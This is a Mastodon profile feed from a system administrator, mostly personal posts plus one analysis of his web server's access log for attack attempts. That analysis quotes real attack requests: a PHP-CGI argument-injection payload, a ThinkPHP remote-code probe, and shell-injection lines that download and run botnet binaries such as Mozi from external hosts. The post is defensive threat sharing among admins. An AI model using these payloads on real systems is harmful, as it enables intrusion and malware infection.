Show more

I just got a much needed haircut. Turns out I wasn't going blind!

If you know something would make someone's day, and you know it's true, why not say it?

If you like the country someone comes from, or if you like what someone cooked, just say it.

We always like hearing sincere compliments, so why not take the first step? 馃憤

@supernova System administration, security, and development, in that order, although my sysadmin experience is much more extended.

Does anyone know of an European IT company hiring English speakers? I am willing to learn the local language, but I will probably not have full proficiency on day one.

I'm thinking Ireland, Switzerland, Germany, Norway, Finland, although I can also consider Canada, New Zealand, Australia and other countries outside of Europe.

Please, contact me or let me know where I can apply!

I'm now on FreeNode with the nick L1Cafe. Recommend me techy channels to join! :D

fediadmin, security, long 

Did not clear my access log for some time, amassing over 300MBs.

What I looked at

Common attack patterns (SQLi, BOF, path traversal etc.)
Common attack URLs (e.g. https://github.com/danielmiessler/SecLists/)
Bad and unusual HTTP status codes
POST requests against unusual places (no inbox, push)

Findings

One IP tries to actively enumerate Fedi accounts: 75.64.236[.]168
241 IPs tried to blindly exploit non-fedi-specific services, e.g. SQL injects, posting shells
53 IPs did enumeration only, looking exploitable services and shells
Most popular was checking for Wordpress, phpMyAdmin and looking for existing shells
The crawler from fediverse[.]space seems okay, but if you want to block: 64.227.114[.]249

Details

Top attackers

211.21.226[.]123 Taiwan 122.14.213[.]79 China 113.53.230[.]34 Thailand 150.109.78[.]53 Singapore 118.25.38[.]1 China 118.25.111[.]38 China 106.12.40[.]125 China 103.45.99[.]20 China 47.199.217[.]59 US

The longest attack URL, used by many Chinese attackers

"POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1"

This URL decodes to:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

I鈥檇 rather not Think PHP, thanks

"GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"

Ask and thou shalt receive. 16 attackers asked for a shell.

GET /shell.php HTTP/1.1

Kinda cute

"GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.137.154[.]33/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 146 "-" "Hello, world" "-" "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.13.206[.]99:34286/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1"

Top unusal request lines

24 "https[:]//volcable.ru/" 21 "https[:]//jyvopys.com/" 18 "https[:]//vulkan-platinym24.ru/" 18 "https[:]//sexjk.com/" 18 "https[:]//glassdeskguide.com/" 18 "https[:]//dezgorkontrol.ru/" 18 "https[:]//brendof-club.com/" 18 "https[:]//arabic-poetry.com/" 18 "http[:]//hacron.ru/" 15 "https[:]//se.painting-planet.com/" 15 "https[:]//landofgames.ru/"

#fediadmin #mastoadmin

Does anyone know why I can reach reserved IPv4 address spaces like 10.200.0.0/16 from my OVH server?

OK, WireGuard time. First time using it, wish me luck. :blobthinkingeyes:

Hi! Do you know good books on climate research and terraforming? If you don't, can you boost / retweet this so it reaches more people? Maybe some of your followers know! Thanks!

@vickysteeves Hey, it's fine to not be good at "writing full things", nobody can be good at everything simultaneously, why not delegate?

@sheogorath My blog has date-style post links. The only downside is that it will break old links, so search engines and old notes need to be updated for that. l1cafe.blog/2019/03/03/kuya-1- for example.

Show more

Le贸n Castillejos's choices:

Mastodon 馃攼 privacytools.io

Fast, secure and up-to-date instance. PrivacyTools provides knowledge and tools to protect your privacy against global mass surveillance.

Website: privacytools.io
Matrix Chat: chat.privacytools.io
Support us on OpenCollective, many contributions are tax deductible!